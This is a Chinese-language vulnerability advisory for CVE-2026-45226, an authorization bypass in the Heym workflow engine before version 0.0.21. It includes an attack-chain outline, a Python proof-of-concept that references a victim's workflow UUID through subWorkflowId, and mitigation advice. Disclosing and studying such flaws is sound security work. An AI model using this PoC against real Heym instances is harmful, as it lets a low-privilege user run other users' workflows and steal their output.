CVE-2026-45226 CVSS 7.1 高危

CVE-2026-45226 Heym工作流执行授权绕过漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45226

漏洞类型

授权绕过

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Heym

漏洞概述

Heym 0.0.21之前版本存在授权绕过漏洞。攻击者利用工作流执行中对UUID访问验证的缺失，通过构造恶意工作流引用受害者工作流的UUID。这允许低权限用户在未经授权的情况下执行任意目标工作流，窃取敏感输出数据并触发非预期的节点副作用。

技术细节

该漏洞的核心在于Heym工作流引擎在解析execute节点或agent subWorkflowIds时，未验证当前用户是否拥有被引用UUID对应工作流的访问权限。攻击者首先需要获取一个有效的认证账户，然后创建一个新的工作流。在该工作流中，攻击者将特定节点的引用目标设置为已知的受害者工作流UUID。当攻击者执行此恶意工作流时，系统会直接加载受害者的工作流逻辑并在攻击者的会话上下文中运行。由于缺乏访问控制列表（ACL）检查，这种跨用户的引用操作成功绕过了授权机制，导致数据泄露及逻辑篡改。

攻击链分析

STEP 1

信息收集

攻击者枚举或猜测系统中存在的工作流UUID，寻找高价值目标。

STEP 2

身份认证

攻击者使用合法凭证登录Heym平台，获取低权限用户的API Token或Session。

STEP 3

构造恶意工作流

攻击者创建一个新的工作流，在execute节点或agent配置中，将subWorkflowId参数设置为受害者的UUID。

STEP 4

执行利用

攻击者触发该恶意工作流的执行，系统因未校验UUID权限而加载并运行受害者的工作流。

STEP 5

数据窃取与破坏

攻击者获取受害工作流的执行输出，并可能利用受害工作流的逻辑造成系统副作用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL
url = "http://target-heym-instance/api/workflows"

# Attacker's authentication token
headers = {
    "Authorization": "Bearer <ATTACKER_TOKEN>",
    "Content-Type": "application/json"
}

# Victim's Workflow UUID (sensitive data)
victim_uuid = "550e8400-e29b-41d4-a716-446655440000"

# Malicious payload referencing victim's UUID via subWorkflowIds
payload = {
    "name": "Malicious Workflow",
    "nodes": [
        {
            "type": "execute",
            "id": "node_1",
            "data": {
                # Pointing to victim's workflow UUID
                "subWorkflowId": victim_uuid
            }
        }
    ]
}

# Send request to create/execute the workflow
response = requests.post(url, headers=headers, data=json.dumps(payload))

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

影响范围

Heym < 0.0.21

防御指南

临时缓解措施

建议立即检查系统中的工作流创建与执行权限配置，临时限制低权限用户创建包含external引用或subWorkflow节点的工作流，直至完成版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表